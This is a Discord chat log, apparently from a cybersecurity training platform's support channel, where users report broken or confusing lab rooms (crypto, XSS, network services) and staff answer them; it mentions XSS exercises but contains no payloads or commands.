tepid girder
#

Running through the "Encryption - Crypto 101"-room, and one of the questions is regarding the issuer of THM's certificate. The answer doesn't correspond to my result.

Am I just doing it wrong, or have things changed since the question was made? 😅

sharp grotto
oak mulch
#

Possible issue in the XSS room in the Web Fundamentals catalogue under DOM-Based XSS and the XSS Playground, Task 5. I've inputted the required injection and the response to it to trigger a flag seems a little fickle. I'm using Attack Box as per usual.

Seems when inputting the exploit in a blank state, it won't trigger a flag for me either due to delay in registering it or not liking how the exploit is formatted? Not quite sure, but it seems to have a bit of a problem with how it's inputted. Seems to also be fickle concerning the color change portion of it too.

#

Also ignores if you put an actual image link in there to mouse-over with it. No flag triggered for it even though the contents of the cookie request is displayed in the alert.

#

It does eventually trigger a flag however if you screw with it a little bit without an actual picture link, but it's a bit of a fight to recognize.

oak mulch
#

Filter Evasion's also a bit rough. I've found ways to bypass the filters and trigger a "Hello" alert, but the application I guess doesn't recognize that input so it won't give me a flag. 😦

dusky junco
livid escarpBOT
#

Gave +1 Rep to @wind wraith

dusky junco
#

Hey, could you provide some further detail please? I'm looking into this room and solving issues here and there as we speak

dusky junco
eternal summit
#

RIP

livid escarpBOT
#

Gave +1 Rep to @dusky junco

lone wind
#

But I just remember that I couldn’t install the tool on kali

#

It wouldn’t install

dusky junco
#

Ah yeah

#

that is why the VM in the room has been provided for you

#

it's not in kali/any linux apt repos

#

also, the VM in the room contains the files that you need to generate rules for, etc

lone wind
#

Alright! Ty

dusky junco
lone wind
#

But also the attack box I think was broken too

#

not sure

dusky junco
#

yes it'll be the same for the attackbox

#

you need to use the VM attaced in the room specifically

#

(in browser access is setup and ocnfigured for it in the room)

dusky junco
livid escarpBOT
#

Gave +1 Rep to @dark hearth

midnight junco
#

but this is what you see if the machine is started, but now it looks like if it has the IP address it won't work:

twin tapir
midnight junco
#

Look at the highlighted text. Do you agree that since it says "10.10.63.200" (instead of Machine IP), the sentence indicates it will not work

#

but that is actually when it WILL work, because the IP address has been populated

#

but if you load the machine before reading the instructions, it's very confusing

obsidian kiln
midnight junco
obsidian kiln
#

Yeah, wouldn't want that 🙂

snow rain
#

room/betworkservices task 3&4

Images used in these tasks aren't available to be viewed in Canada. Policy of flaticon.com I believe.

stable plover
#

hi. someone knows why in root linux fundamentals part 1, in the machine deployed the user is root and not tryhackme?

obsidian kiln
stable plover
livid escarpBOT
#

Gave +1 Rep to @obsidian kiln

simple merlin
pearl ridge
#

Room; Network Services, Task; 9 : Ports 21 and 80 on the target machines should be open but in one instance both were closed, in other three different VM, the 80 is always closed, 21 is open.

dusky junco